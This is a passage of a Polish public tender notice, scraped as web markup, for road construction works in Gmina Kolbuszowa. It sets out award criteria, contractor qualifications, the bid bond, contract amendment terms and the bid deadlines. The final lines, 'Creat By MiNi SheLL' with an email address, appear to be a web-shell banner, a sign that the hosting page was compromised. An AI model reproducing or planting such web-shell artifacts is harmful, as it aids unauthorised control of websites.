roboty przygotowawcze,<br/>- roboty ziemne,<br/>- wykonanie konstrukcji podbudowy i nawierzchni dróg z betonu asfaltowego,<br/>- wykonanie poboczy dróg,<br/>- budowa chodników,<br/>- przebudowa i budowa zjazdów,<br/>- roboty wykończeniowe,<br/>- wykonanie elementów ulic,<br/>- wykonanie i przebudowa elementów systemu odwodnienia dróg,<br/>- wykonanie oznakowania pionowego i poziomego dróg,<br/>- budowa kanału technologicznego,<br/>- przebudowa i budowa oświetlenia ulicznego,<br/>- przebudowa i/lub likwidacja kolizji z istniejącymi sieciami i urządzeniami uzbrojenia technicznego.<br/>2. Warunki, na jakich zostanie udzielone zamówienie:<br/>1) W prowadzonym postępowaniu na podstawie art. 214 ust 1 pkt 7) Zamawiający będzie wprowadzał podstawy wykluczenia z<br/>postępowania identyczne z tymi, które stosował<br/>w pierwotnym przetargu łącznie z takimi samymi dokumentami na potwierdzenie ich spełnienia, tzn. wymienione w rozdziale 15, 19<br/>2) Obowiązywać będą te same zasady dotyczące podwykonawstwa.<br/>3) Terminy płatności i zasady rozliczeń nie będą modyfikowane w stosunku i proporcji do pierwotnego zamówienia i umowy.</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">kryteria wyboru ofert określono w Instrukcji dla Wykonawców (Rozdział I SWZ)</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60,00</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">długośc okresu gwarancji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40,00</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1. W postępowaniu o udzielenie zamówienia zamawiający może żądać podmiotowych środków dowodowych na<br/>potwierdzenie:<br/>2. Braku podstaw wykluczenia<br/>W celu potwierdzenia spełniania przez wykonawcę warunków udziału w postępowaniu Wykonawca składa aktualne na<br/>dzień składania ofert oświadczenie o braku podstaw do wykluczenia – zał. Nr 1a do Rozdział I SWZ. W przypadku<br/>udostępnienia zasobów – oświadczenie podmiotu udostępniającego zasoby stanowi załącznik nr 1b Rozdział I SWZ.<br/>Informacje zawarte w oświadczeniu będą stanowić potwierdzenie, że wykonawca nie podlega wykluczeniu.<br/>3. Spełniania warunków udziału w postępowaniu lub kryteriów selekcji.<br/>W celu potwierdzenia spełniania przez wykonawcę warunków udziału w postępowaniu Wykonawca składa aktualne na<br/>dzień składania ofert oświadczenie o spełnianiu warunków udziału w postępowaniu – zał. Nr 1a do Rozdział I SWZ. W<br/>przypadku udostępnienia zasobów – oświadczenie podmiotu udostępniającego zasoby stanowi załącznik nr 1b Rozdział I<br/>SWZ. Informacje zawarte w oświadczeniu będą stanowić wstępne potwierdzenie, że wykonawca spełnia warunki udziału w<br/>postępowaniu.<br/>4. Opis warunków udziału w postępowaniu:<br/>1) Warunek zdolności do występowania w obrocie gospodarczym – wpis do odpowiedniego rejestru.<br/>Zamawiający nie precyzuje warunków w przedmiotowym zakresie.<br/>2) Warunek posiadania uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej – zezwolenia,<br/>licencje, koncesje lub wpis do rejestru.<br/>Zamawiający nie precyzuje warunków w przedmiotowy zakresie.<br/>3) Warunki dotyczące określonej sytuacji finansowej lub ekonomicznej.<br/>a. Wykonawca spełni warunek udziału w postępowaniu dotyczący sytuacji ekonomicznej<br/>lub finansowej, jeżeli wykaże, że posiada ubezpieczenie od odpowiedzialności cywilnej<br/>w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na sumę gwarancyjną nie mniejsza niż:<br/>1.800.000,00 zł<br/>4) Warunki dotyczące niezbędnego wykształcenia, kwalifikacji zawodowych, doświadczenia, potencjału technicznego:<br/>a. Wykonawca spełnia ten warunek udziału w postępowaniu /dotyczący kwalifikacji zawodowych, doświadczenia/, jeżeli<br/>wykaże, że dysponuje następującymi osobami:<br/>1. Kierownik budowy – branża drogowa – 1 osoba – wymagania:<br/>Osoba ta musi posiadać uprawnienia budowlane w specjalności drogowej – bez ograniczeń – wydane zgodnie z ustawą z<br/>dnia 7 lipca 1994 r. Prawo budowlane oraz Rozporządzeniem Ministra Inwestycji i Rozwoju z dnia 29 kwietnia 2019 r. w<br/>sprawie przygotowania zawodowego do wykonywania samodzielnych funkcji technicznych w budownictwie (Dz. U. poz.<br/>831) albo odpowiadające im ważne uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących<br/>przepisów, które pozwalać będą na pełnienie funkcji Kierownika Budowy w zakresie niniejszego zamówienia.<br/>Osoba ta musi posiadać minimum 3-letnie doświadczenie. Ilość lat doświadczenia należy liczyć od daty wystawienia<br/>uprawnień w specjalności drogowej.<br/>2. Kierownik robót – branża sanitarna – 1 osoba – wymagania:<br/>Osoba ta musi posiadać uprawnienia budowlane w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń<br/>cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych –<br/>bez ograniczeń – wydane zgodnie z ustawą z dnia 7 lipca 1994 r. Prawo budowlane oraz Rozporządzeniem Ministra<br/>Inwestycji i Rozwoju z dnia 29 kwietnia 2019 r. w sprawie przygotowania zawodowego do wykonywania samodzielnych<br/>funkcji technicznych w budownictwie (Dz. U. poz. 831)<br/>albo odpowiadające im ważne uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących<br/>przepisów, które pozwalać będą na pełnienie funkcji Kierownika Robót w zakresie niniejszego zamówienia.<br/>Osoba ta musi posiadać minimum 3-letnie doświadczenie. Ilość lat doświadczenia należy liczyć od daty wystawienia<br/>uprawnień w specjalności sanitarnej.<br/>3. Kierownik robót – branża elektryczna – 1 osoba – wymagania:<br/>Osoba ta musi posiadać uprawnienia budowlane w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń<br/>elektrycznych elektroenergetycznych – bez ograniczeń – wydane zgodnie z ustawą z dnia 7 lipca 1994 r. Prawo budowlane<br/>(t.j. Dz. U. z 2019 poz. 1186 z późn. zm.) oraz Rozporządzeniem Inwestycji i Rozwoju z dnia 29 kwietnia 2019 r. w sprawie<br/>przygotowania zawodowego do wykonywania samodzielnych funkcji technicznych w budownictwie (Dz. U. poz. 831) albo<br/>odpowiadające im ważne uprawienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów,<br/>które pozwalać będą na pełnienie funkcji Kierownika Robót w zakresie niniejszego zamówienia.<br/>Osoba ta musi posiadać minimum 3-letnie doświadczenie. Ilość lat doświadczenia należy liczyć od daty wystawienia<br/>uprawnień o specjalności elektrycznej.<br/>UWAGA:<br/>Dotyczy osób określonych w punktach od 1 do 3:<br/>Uprawnienia budowlane powinny być wydane zgodnie z ustawą z dnia 7 lipca 1994 r. Prawo budowlane (tj. Dz. U. z 2020<br/>poz. 1333 z późn. zm.) oraz Rozporządzeniem Ministra Inwestycji i Rozwoju z dnia 29 kwietnia 2019 r. w sprawie<br/>przygotowanie zawodowego do wykonywania samodzielnych funkcji technicznych w budownictwie (Dz. U. poz. 831) albo<br/>odpowiadające im ważne uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów,<br/>które pozwalać będą na pełnienie funkcji Kierownika Budowy/Robót w zakresie niniejszego zamówienia. Osoby te muszą<br/>posiadać minimum 3-letnie doświadczenie. Ilość lat doświadczenia należy liczyć od daty wystawienia uprawnień.<br/>Dotyczy wszystkich osób mających pełnić funkcję kierownika budowy lub robót.<br/>b. Wykonawca spełni ten warunek udziału w postępowaniu /dotyczący doświadczenia/ jeżeli wykaże, że: wykonał w ciągu<br/>ostatnich 5 lat przed upływem terminu składania ofert (a jeżeli okres prowadzenia działalności jest krótszy –<br/>w tym okresie):<br/>- minimum jedną robotę budowlaną polegającą na budowie i/lub przebudowie i/lub rozbudowie drogi o łącznej wartości nie<br/>mniej niż 1.800.000,00 zł brutto.<br/>Jeżeli w dokumentach składanych w celu potwierdzenia spełniania warunków udziału<br/>w postępowaniu, kwoty będą wyrażane w walucie obcej, kwoty te zostaną przeliczone na PLN wg średniego kursu PLN w<br/>stosunku do walut obcych ogłaszanego przez Narodowy Bank Polski (Tabela A kursów średnich walut obcych) w dniu<br/>publikacji ogłoszenia w UZP. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">Zamawiający nie precyzuje warunków w przedmiotowym zakresie.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">1. W<br/>postępowaniu o udzielenie zamówienia zamawiający może żądać podmiotowych środków dowodowych na potwierdzenie:<br/>2. Braku podstaw wykluczenia<br/>W celu potwierdzenia spełniania przez wykonawcę warunków udziału w postępowaniu Wykonawca składa aktualne na dzień<br/>składania ofert oświadczenie o braku podstaw do wykluczenia – zał. Nr 1a do Rozdział I SWZ. W przypadku udostępnienia zasobów<br/>– oświadczenie podmiotu udostępniającego zasoby stanowi załącznik nr 1b Rozdział I SWZ. Informacje zawarte w oświadczeniu<br/>będą stanowić potwierdzenie, że wykonawca nie podlega wykluczeniu.<br/>3. Spełniania warunków udziału w postępowaniu lub kryteriów selekcji.<br/>W celu potwierdzenia spełniania przez wykonawcę warunków udziału w postępowaniu Wykonawca składa aktualne na dzień<br/>składania ofert oświadczenie o spełnianiu warunków udziału w postępowaniu – zał. Nr 1a do Rozdział I SWZ. W przypadku<br/>udostępnienia zasobów – oświadczenie podmiotu udostępniającego zasoby stanowi załącznik nr 1b Rozdział I SWZ. Informacje<br/>zawarte w oświadczeniu będą stanowić wstępne potwierdzenie, że wykonawca spełnia warunki udziału w postępowaniu.<br/>4. Opis warunków udziału w postępowaniu:<br/>1) Warunki dotyczące określonej sytuacji finansowej lub ekonomicznej.<br/>W celu potwierdzenia spełniania przez wykonawcę warunków udziału w postępowaniu<br/>lub kryteriów selekcji dotyczących sytuacji ekonomicznej lub finansowej zamawiający może żądać, w szczególności, następujących<br/>podmiotowych środków dowodowych:<br/>Dokumentów potwierdzających, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej<br/>działalności związanej z przedmiotem zamówienia ze wskazaniem sumy gwarancyjnej tego ubezpieczenia.<br/>Jeżeli z uzasadnionej przyczyny wykonawca nie może złożyć wymaganych przez zamawiającego podmiotowych środków<br/>dowodowych, o których mowa w lit. a, wykonawca składa inne podmiotowe środki dowodowe, które wystarczający sposób<br/>potwierdzają spełnienie opisanego przez zamawiającego warunku udziału w postępowaniu lub kryteriów selekcji dotyczącego<br/>sytuacji ekonomicznej lub finansowej.<br/>2) Warunki dotyczące niezbędnego wykształcenia, kwalifikacji zawodowych, doświadczenia, potencjału technicznego:<br/>a. Wykonawca spełnia ten warunek udziału w postępowaniu /dotyczący kwalifikacji zawodowych, doświadczenia/, jeżeli wykaże, że<br/>dysponuje następującymi osobami:<br/>W celu potwierdzenia spełniania przez wykonawcę warunków udziału w postępowaniu lub kryteriów selekcji dotyczących zdolności<br/>technicznej lub zawodowej, zamawiający może, w zależności od charakteru, znaczenia, przeznaczenia lub zakresu robót<br/>budowlanych, dostaw lub usług, żądać następujących podmiotowych środków dowodowych: wykazu osób /wzór wykazu osób<br/>stanowi załącznik nr 1d -Rozdział I SWZ/<br/>b. Wykonawca spełni ten warunek udziału w postępowaniu /dotyczący doświadczenia/ jeżeli wykaże, że: wykonał w ciągu ostatnich<br/>5 lat przed upływem terminu składania ofert (a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie):<br/>W celu potwierdzenia spełniania przez wykonawcę warunków udziału w postępowaniu lub kryteriów selekcji dotyczących zdolności<br/>technicznej lub zawodowej, zamawiający może, w zależności od charakteru, znaczenia, przeznaczenia lub zakresu robót<br/>budowlanych, dostaw lub usług, żądać następujących podmiotowych środków dowodowych:<br/>Wykazu robót budowlanych wykonywanych nie wcześniej niż w okresie ostatnich 5 lat, a jeżeli okres prowadzenia działalności jest<br/>krótszy – w tym okresie, wraz z podaniem ich rodzaju, wartości, daty i miejsca wykonania oraz podmiotów, na rzecz których roboty te<br/>zostały wykonane, oraz załączeniem dowodów określających, czy te roboty budowlane zostały wykonane należycie, przy czym<br/>dowodami, o których mowa, są referencje bądź inne dokumenty sporządzone przed podmiot, na rzecz którego roboty budowlane<br/>zostały wykonane, a jeżeli wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów – inne<br/>odpowiednie dokumenty.<br/>/wzór wykazu stanowi załącznik nr 1e -Rozdział I SWZ/</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> Zamawiający nie precyzuje warunków w przedmiotowym zakresie. <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> Do oferty należy dołączyć:<br/>1) Pełnomocnictwo upoważniające do złożenia oferty, o ile ofertę składa pełnomocnik;<br/>2) Pełnomocnictwo dla pełnomocnika do reprezentowania w postępowaniu Wykonawców wspólnie ubiegających się o<br/>udzielenie zamówienia - dotyczy ofert składanych przez Wykonawców wspólnie ubiegających się o udzielenie zamówienia;<br/>3) Oświadczenie Wykonawcy o niepodleganiu wykluczeniu z postępowania – zał. Nr 1a do Rozdział I SWZ. W przypadku<br/>udostępnienia zasobów – oświadczenie podmiotu udostępniającego zasoby stanowi załącznik nr 1b Rozdział I SWZ. W<br/>przypadku wspólnego ubiegania się o zamówienie przez Wykonawców, oświadczenie o niepodleganiu wykluczeniu składa<br/>każdy z Wykonawców.;<br/>4) Oświadczenie Wykonawcy o spełnieniu warunków udziału w postępowaniu – zał. Nr 1a do Rozdział I SWZ. W przypadku<br/>udostępnienia zasobów – oświadczenie podmiotu udostępniającego zasoby stanowi załącznik nr 1b Rozdział I SWZ.<br/>5) Tabela elementów scalonych<br/>6) Potwierdzenie wniesienia wadium. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> 1. Zamawiający żąda wniesienia przez Wykonawcę wadium w wysokości: 40.000,00 zł<br/>2. Zamawiający w przypadku udzielenia zamówień, o których mowa w art. 214 ust. 1 pkt 7 i 8 lub art. 388 pkt 2 lit. b i c, lub<br/>art. 415 ust. 2 pkt 5 i 6, określa kwotę wadium dla wartości zamówienia podstawowego.<br/>3. Wadium wnosi się przed upływem terminu składania ofert i utrzymuje nieprzerwanie do dnia upływu terminu związania<br/>ofertą, z wyjątkiem przypadków, o których mowa w art. 98 ust. 1 pkt 2 i 3 oraz ust. 2.<br/>4. Przedłużenie terminu związania ofertą jest dopuszczalne tylko z jednoczesnym przedłużeniem okresu ważności wadium<br/>albo, jeżeli nie jest to możliwe, z wniesieniem nowego wadium na przedłużony okres związania ofertą.<br/>5. Wadium może być wnoszone według wyboru wykonawcy w jednej lub kilku następujących formach:<br/>1) Pieniądzu.<br/>2) Gwarancjach bankowych.<br/>3) Gwarancjach ubezpieczeniowych.<br/>4) Poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości. <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> Wspólne ubieganie się Wykonawców o udzielenie zamówienia: Wykonawcy mogą wspólnie<br/>ubiegać się o udzielenie zamówienia:<br/>a) W przypadku, o którym mowa w pkt 7, wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu o<br/>udzielenie zamówienia albo do reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego.<br/>b)Zamawiający nie może wymagać od wykonawców wspólnie ubiegających się o udzielenie zamówienia posiadania<br/>określonej formy prawnej w celu złożenia oferty lub wniosku o<br/>dopuszczenie do udziału w postępowaniu.<br/>c) Przepisy dotyczące wykonawcy stosuje się odpowiednio do wykonawców wspólnie ubiegających się o udzielenie<br/>zamówienia. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.2.) Informacje na temat zaliczek: </h3> 27.1.1.1.	Płatności I – etap I (faktura częściowa) - 2% wartości zadania – wynagrodzenia wykonawcy (wkład własny Gminy Kolbuszowa) – płatne w formie zaliczki na zasadach określonych w pkt. 27.4 niniejszej umowy - środki z Budżetu Gminy Kolbuszowa (ostateczna wartość płatności uzależniona jest od wartości zadania) <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1. Na podstawie art. 455 ustawy Prawo zamówień publicznych (Dz. U. z 2022 r. poz. 1710 ze zm.) istnieje możliwość<br/>dokonania zmiany umowy w formie aneksu pod warunkami:<br/>2. Zmiana terminu realizacji zamówienia z przyczyn nie leżących po stronie Wykonawcy,<br/>w przypadku:<br/>1) Zmiany sposobu realizacji zadania z Programu Rządowego Fundusz Polski Ład: Program Inwestycji Strategicznych<br/>2) wprowadzenia zmian w zakresie opracowania dokumentacji techniczno – projektowej, co może powodować brak<br/>możliwości dotrzymania pierwotnego terminu zakończenia realizacji zawartej umowy,<br/>3) przedłużającego się terminu uzyskania uzgodnień i pozwoleń osób trzecich w ramach projektowania,<br/>4) przerw w realizacji robót budowlanych powstałych z przyczyn nie leżących po stronie Wykonawcy,<br/>5) powierzenia przez Zamawiającego wykonania zamówień dodatkowych lub robót zamiennych, jeżeli terminy ich<br/>powierzenia, rodzaj lub zakres uniemożliwiają dotrzymanie pierwotnego terminu zakończenia realizacji umowy,<br/>6) konieczności uzyskania niemożliwych do przewidzenia na etapie planowania inwestycji: danych, zgód lub pozwoleń osób<br/>trzecich albo właściwych organów,<br/>7) wystąpienia opóźnień wynikających z odmowy lub opóźnienia wydania przez organy administracji lub inne podmioty<br/>wymaganych decyzji, zezwoleń, uzgodnień, opinii<br/>z przyczyn niezawinionych przez Wykonawcę,<br/>8) wystąpienia opóźnień wynikających z konieczności uzyskania wyroku sądowego lub innego orzeczenia sądu, lub organu,<br/>którego konieczności nie przewidywano przy zawieraniu umowy,<br/>9) wystąpienia warunków geologicznych, geotechnicznych lub hydrologicznych odbiegających w sposób istotny od<br/>przyjętych w Dokumentacji projektowej, rozpoznania terenu w zakresie znalezisk archeologicznych, występowania<br/>niewybuchów lub niewypałów, które mogą skutkować w świetle dotychczasowych założeń niewykonaniem lub nienależytym<br/>wykonaniem przedmiotu Umowy,<br/>10) odmiennych od przyjętych w dokumentacji projektowej warunków terenowych<br/>(w szczególności istnienie niezinwentaryzowanych lub błędnie zinwentaryzowanych obiektów),<br/>11) wystąpienia warunków atmosferycznych, terenowych lub wodnych utrudniających wykonanie umowy, które<br/>spowodowały niezawinione i niemożliwe do uniknięcia przez wykonawcę opóźnienie, w szczególności długotrwałe opady<br/>atmosferyczne, wysokie stany wód gruntowych, lokalne podtopienia, stany zagrożenia powodziowego – o czas, w którym z<br/>powodu warunków atmosferycznych umowa nie mogła być realizowana,<br/>12) wstrzymania realizacji prac objętych umową, co uniemożliwia terminowe zakończenie realizacji przedmiotu umowy.<br/>Pozostałe zmiany umowy określono w pkt. 31 Projektowanych postanowień umowy - Rozdział IV SWZ. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2022-12-12 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">www.ekolbuszowa.logintrade.net</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2022-12-12 12:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2023-01-10</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com